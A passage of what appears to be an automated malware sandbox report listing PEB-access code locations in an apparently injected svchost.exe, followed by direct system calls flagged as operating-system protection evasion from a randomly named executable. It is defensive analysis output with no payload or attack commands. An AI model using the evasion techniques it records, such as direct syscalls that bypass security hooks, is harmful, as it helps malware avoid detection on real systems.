            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B551EF mov eax, dword ptr fs:[00000030h]2_2_03B551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B351ED mov eax, dword ptr fs:[00000030h]2_2_03B351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03B6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03B6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B31131 mov eax, dword ptr fs:[00000030h]2_2_03B31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B31131 mov eax, dword ptr fs:[00000030h]2_2_03B31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B136 mov eax, dword ptr fs:[00000030h]2_2_03B2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05152 mov eax, dword ptr fs:[00000030h]2_2_03C05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F172 mov eax, dword ptr fs:[00000030h]2_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC9179 mov eax, dword ptr fs:[00000030h]2_2_03BC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37152 mov eax, dword ptr fs:[00000030h]2_2_03B37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29148 mov eax, dword ptr fs:[00000030h]2_2_03B29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C050D9 mov eax, dword ptr fs:[00000030h]2_2_03C050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35096 mov eax, dword ptr fs:[00000030h]2_2_03B35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D090 mov eax, dword ptr fs:[00000030h]2_2_03B5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D090 mov eax, dword ptr fs:[00000030h]2_2_03B5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6909C mov eax, dword ptr fs:[00000030h]2_2_03B6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2D08D mov eax, dword ptr fs:[00000030h]2_2_03B2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B550E4 mov eax, dword ptr fs:[00000030h]2_2_03B550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B550E4 mov ecx, dword ptr fs:[00000030h]2_2_03B550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B590DB mov eax, dword ptr fs:[00000030h]2_2_03B590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov ecx, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C0 mov eax, dword ptr fs:[00000030h]2_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03BAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03BAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF903E mov eax, dword ptr fs:[00000030h]2_2_03BF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C05060 mov eax, dword ptr fs:[00000030h]2_2_03C05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov ecx, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41070 mov eax, dword ptr fs:[00000030h]2_2_03B41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD070 mov ecx, dword ptr fs:[00000030h]2_2_03BAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB106E mov eax, dword ptr fs:[00000030h]2_2_03BB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD705E mov ebx, dword ptr fs:[00000030h]2_2_03BD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD705E mov eax, dword ptr fs:[00000030h]2_2_03BD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B052 mov eax, dword ptr fs:[00000030h]2_2_03B5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03B5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F7BA mov eax, dword ptr fs:[00000030h]2_2_03B2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB97A9 mov eax, dword ptr fs:[00000030h]2_2_03BB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBF7AF mov eax, dword ptr fs:[00000030h]2_2_03BBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF78A mov eax, dword ptr fs:[00000030h]2_2_03BEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03B3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B357C0 mov eax, dword ptr fs:[00000030h]2_2_03B357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C037B6 mov eax, dword ptr fs:[00000030h]2_2_03C037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29730 mov eax, dword ptr fs:[00000030h]2_2_03B29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B29730 mov eax, dword ptr fs:[00000030h]2_2_03B29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B65734 mov eax, dword ptr fs:[00000030h]2_2_03B65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3973A mov eax, dword ptr fs:[00000030h]2_2_03B3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3973A mov eax, dword ptr fs:[00000030h]2_2_03B3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03749 mov eax, dword ptr fs:[00000030h]2_2_03C03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF72E mov eax, dword ptr fs:[00000030h]2_2_03BEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B33720 mov eax, dword ptr fs:[00000030h]2_2_03B33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4F720 mov eax, dword ptr fs:[00000030h]2_2_03B4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF972B mov eax, dword ptr fs:[00000030h]2_2_03BF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6F71F mov eax, dword ptr fs:[00000030h]2_2_03B6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6F71F mov eax, dword ptr fs:[00000030h]2_2_03B6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B37703 mov eax, dword ptr fs:[00000030h]2_2_03B37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35702 mov eax, dword ptr fs:[00000030h]2_2_03B35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B35702 mov eax, dword ptr fs:[00000030h]2_2_03B35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2B765 mov eax, dword ptr fs:[00000030h]2_2_03B2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
